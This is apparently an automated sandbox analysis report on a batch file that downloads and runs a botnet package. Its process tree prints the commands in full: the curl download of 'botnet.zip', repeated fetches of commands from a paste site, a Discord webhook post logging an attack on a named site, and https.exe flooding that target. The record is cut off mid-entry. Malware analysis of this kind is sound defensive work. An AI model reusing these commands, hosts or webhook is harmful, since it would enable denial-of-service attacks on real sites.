ad80a704ac0ce9868279a0a3d4e85a2582aff13a9e24a0b46478800fa341b260

Analysis

max time kernel
1800s
max time network
1800s
platform
windows10-2004_x64
resource
win10v2004-20230703-en
resource tags

arch:x64arch:x86image:win10v2004-20230703-enlocale:en-usos:windows10-2004-x64system
submitted
18/08/2023, 00:30

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

2.bat
Size

779B
MD5

f80b95d6836f18d936105783c4e2c186
SHA1

b95ee9d9ea1d9df6d5dc16ffb400f34a497823a6
SHA256

ad80a704ac0ce9868279a0a3d4e85a2582aff13a9e24a0b46478800fa341b260
SHA512

c50803b213cda537b254633ad48c70bff055b04fdb99829e898d2c7626a24d018709b35dc92f1e89b217f9bb6efafbd2e5074a32e307a89830b8453b4bee1291

Score

9^/10

discovery

Malware Config

Signatures

Contacts a large (7966) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Executes dropped EXE 9 IoCs

pid	Process
2020	forvmbox.exe
488	https.exe
1272	https.exe
2544	https.exe
3908	https.exe
2992	https.exe
1416	https.exe
3084	https.exe
4392	https.exe

Unexpected DNS network traffic destination 3 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	208.67.222.222
Destination IP	208.67.222.222
Destination IP	208.67.222.222

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallService\{9424BE78-7657-4DB2-A05F-F2E8D6B14787}.catalogItem	svchost.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\InstallAgent\Checkpoints\9NCBCSZSJRSB.dat	svchost.exe

Delays execution with timeout.exe 64 IoCs

evasion

pid	Process
4060	timeout.exe
4476	timeout.exe
1448	timeout.exe
4300	timeout.exe
1416	timeout.exe
2896	timeout.exe
4056	timeout.exe
2900	timeout.exe
3076	timeout.exe
632	timeout.exe
2776	timeout.exe
3024	timeout.exe
3044	timeout.exe
932	timeout.exe
4532	timeout.exe
3908	timeout.exe
4276	timeout.exe
2144	timeout.exe
3212	timeout.exe
3556	timeout.exe
4272	timeout.exe
2816	timeout.exe
2184	timeout.exe
2172	timeout.exe
972	timeout.exe
2252	timeout.exe
1272	timeout.exe
2340	timeout.exe
4720	timeout.exe
4884	timeout.exe
4916	timeout.exe
1156	timeout.exe
400	timeout.exe
4440	timeout.exe
1508	timeout.exe
5004	timeout.exe
4020	timeout.exe
1416	timeout.exe
4488	timeout.exe
4864	timeout.exe
732	timeout.exe
1232	timeout.exe
1796	timeout.exe
4744	timeout.exe
1248	timeout.exe
416	timeout.exe
960	timeout.exe
3100	timeout.exe
1268	timeout.exe
3252	timeout.exe
3340	timeout.exe
3544	timeout.exe
4324	timeout.exe
3636	timeout.exe
4672	timeout.exe
3068	timeout.exe
1108	timeout.exe
2376	timeout.exe
4872	timeout.exe
440	timeout.exe
4208	timeout.exe
1016	timeout.exe
3684	timeout.exe
4160	timeout.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
4092	powershell.exe
4092	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4092	powershell.exe
Token: SeManageVolumePrivilege	4008	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1156 wrote to memory of 4964	1156	cmd.exe	28
PID 1156 wrote to memory of 4964	1156	cmd.exe	28
PID 1156 wrote to memory of 4092	1156	cmd.exe	84
PID 1156 wrote to memory of 4092	1156	cmd.exe	84
PID 1156 wrote to memory of 2020	1156	cmd.exe	93
PID 1156 wrote to memory of 2020	1156	cmd.exe	93
PID 1156 wrote to memory of 2020	1156	cmd.exe	93
PID 1156 wrote to memory of 4080	1156	cmd.exe	97
PID 1156 wrote to memory of 4080	1156	cmd.exe	97
PID 4080 wrote to memory of 4496	4080	cmd.exe	94
PID 4080 wrote to memory of 4496	4080	cmd.exe	94
PID 4080 wrote to memory of 552	4080	cmd.exe	95
PID 4080 wrote to memory of 552	4080	cmd.exe	95
PID 1156 wrote to memory of 1220	1156	cmd.exe	96
PID 1156 wrote to memory of 1220	1156	cmd.exe	96
PID 2020 wrote to memory of 2016	2020	forvmbox.exe	100
PID 2020 wrote to memory of 2016	2020	forvmbox.exe	100
PID 2016 wrote to memory of 3020	2016	cmd.exe	101
PID 2016 wrote to memory of 3020	2016	cmd.exe	101
PID 2016 wrote to memory of 2328	2016	cmd.exe	102
PID 2016 wrote to memory of 2328	2016	cmd.exe	102
PID 2016 wrote to memory of 488	2016	cmd.exe	103
PID 2016 wrote to memory of 488	2016	cmd.exe	103
PID 2016 wrote to memory of 3320	2016	cmd.exe	104
PID 2016 wrote to memory of 3320	2016	cmd.exe	104
PID 2016 wrote to memory of 3024	2016	cmd.exe	105
PID 2016 wrote to memory of 3024	2016	cmd.exe	105
PID 2016 wrote to memory of 4248	2016	cmd.exe	106
PID 2016 wrote to memory of 4248	2016	cmd.exe	106
PID 2016 wrote to memory of 4536	2016	cmd.exe	107
PID 2016 wrote to memory of 4536	2016	cmd.exe	107
PID 2016 wrote to memory of 3532	2016	cmd.exe	108
PID 2016 wrote to memory of 3532	2016	cmd.exe	108
PID 2016 wrote to memory of 1692	2016	cmd.exe	109
PID 2016 wrote to memory of 1692	2016	cmd.exe	109
PID 2016 wrote to memory of 3860	2016	cmd.exe	110
PID 2016 wrote to memory of 3860	2016	cmd.exe	110
PID 2016 wrote to memory of 2496	2016	cmd.exe	111
PID 2016 wrote to memory of 2496	2016	cmd.exe	111
PID 2016 wrote to memory of 2036	2016	cmd.exe	112
PID 2016 wrote to memory of 2036	2016	cmd.exe	112
PID 2016 wrote to memory of 400	2016	cmd.exe	113
PID 2016 wrote to memory of 400	2016	cmd.exe	113
PID 2016 wrote to memory of 2828	2016	cmd.exe	114
PID 2016 wrote to memory of 2828	2016	cmd.exe	114
PID 2016 wrote to memory of 2816	2016	cmd.exe	115
PID 2016 wrote to memory of 2816	2016	cmd.exe	115
PID 2016 wrote to memory of 3304	2016	cmd.exe	116
PID 2016 wrote to memory of 3304	2016	cmd.exe	116
PID 2016 wrote to memory of 4092	2016	cmd.exe	117
PID 2016 wrote to memory of 4092	2016	cmd.exe	117
PID 2016 wrote to memory of 4392	2016	cmd.exe	118
PID 2016 wrote to memory of 4392	2016	cmd.exe	118
PID 2016 wrote to memory of 4008	2016	cmd.exe	119
PID 2016 wrote to memory of 4008	2016	cmd.exe	119
PID 2016 wrote to memory of 2180	2016	cmd.exe	120
PID 2016 wrote to memory of 2180	2016	cmd.exe	120
PID 2016 wrote to memory of 4620	2016	cmd.exe	121
PID 2016 wrote to memory of 4620	2016	cmd.exe	121
PID 2016 wrote to memory of 4120	2016	cmd.exe	122
PID 2016 wrote to memory of 4120	2016	cmd.exe	122
PID 2016 wrote to memory of 3684	2016	cmd.exe	123
PID 2016 wrote to memory of 3684	2016	cmd.exe	123
PID 2016 wrote to memory of 4532	2016	cmd.exe	124

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\2.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1156
- C:\Windows\system32\curl.exe
  curl -o botnet.zip https://cdn.discordapp.com/attachments/1134556559578517677/1141848588612276304/botney.zip
  2⤵
  PID:4964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -Command "Expand-Archive -Path 'botnet.zip' -DestinationPath 'C:\Users\Admin\Desktop'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4092
- C:\Users\Admin\Desktop\forvmbox.exe
  forvmbox.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:2020
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7942.tmp\7953.tmp\7963.bat C:\Users\Admin\Desktop\forvmbox.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2016
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3020
  - - C:\Windows\system32\curl.exe
      curl -i -H "Accept: application/json" -H "Content-Type:application/json" -X POST --data "{\"content\": null, \"embeds\": [{\"title\": \"Attack :=: https https://file.cunhua.today 17000 50 {}\", \"description\": \" Fri 08/18/2023-50 / \",\"color\": 1127128,\"author\": {\"name\": \"MLBOT BOTNET API LOG\",\"icon_url\": \"https://cdn.discordapp.com/attachments/353651119685107714/1078725179850637372/danger_death_head_internet_security_skull_virus_icon_127111.png\"}}],\"attachments\": []}" https://discord.com/api/webhooks/1140675610524532868/T1taUTk6bStR2J1f9uoXFj7PQAMLD1T1yXMewAm481PLreURT2PLhzfvxpkEb4JO9VJy
      4⤵
      PID:2328
  - - C:\Users\Admin\Desktop\attacks\methods\https.exe
      https.exe https://file.cunhua.today 50
      4⤵
      Executes dropped EXE
      PID:488
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3320
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3024
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4248
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4536
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3532
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1692
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3860
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2496
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2036
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:400
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2828
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2816
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3304
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4092
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4392
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4008
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2180
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4620
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4120
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3684
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4532
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1232
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3088
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2900
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3504
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3700
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3156
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3168
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4756
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3312
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3436
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2296
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4044
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3360
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:544
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4720
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2960
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3636
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4980
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:372
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4448
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4056
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:440
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4300
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:220
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5060
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:452
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2252
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4364
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1380
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3556
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4440
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1444
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1964
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2044
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2172
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:896
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4352
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3848
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:184
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1692
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3860
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:516
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4632
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1716
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2036
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4992
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2704
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1648
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:756
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:864
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3340
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3588
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2996
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3888
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4896
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2312
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3576
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3044
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4372
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4392
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2308
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3416
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:972
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2228
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3684
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3836
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1220
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4628
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2452
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4012
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3504
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3700
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:5096
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3168
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4228
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3312
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2748
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4108
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1196
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1952
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5004
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4044
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4036
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1308
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1160
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4884
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3544
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1548
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1348
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4720
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2144
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4672
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2660
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1492
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:764
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4464
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3212
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:668
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4972
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1744
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1448
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3976
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4060
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4844
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1736
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:228
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4964
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2540
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4652
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3040
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1416
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4684
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3028
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3156
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1628
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:828
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:416
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:548
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3812
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4536
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1136
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4420
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4884
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3216
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4796
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1480
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3076
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1536
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3328
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4268
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4876
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1160
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3096
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1556
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1656
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3076
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:1536
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4560
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3236
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:1744
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4744
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4060
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:2024
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4316
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3556
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2760
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4992
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3092
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4352
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:864
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4448
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4904
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4188
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2676
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3404
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4628
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4160
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4640
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:448
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:3088
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:4228
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:4416
  - - C:\Windows\system32\timeout.exe
      Timeout /t 5 /nobreak
      4⤵
      PID:3628
  - - C:\Windows\system32\curl.exe
      curl -s -o op.bat https://rentry.co/nfago/raw
      4⤵
      PID:2140
  - - C:\Windows\system32\timeout.exe
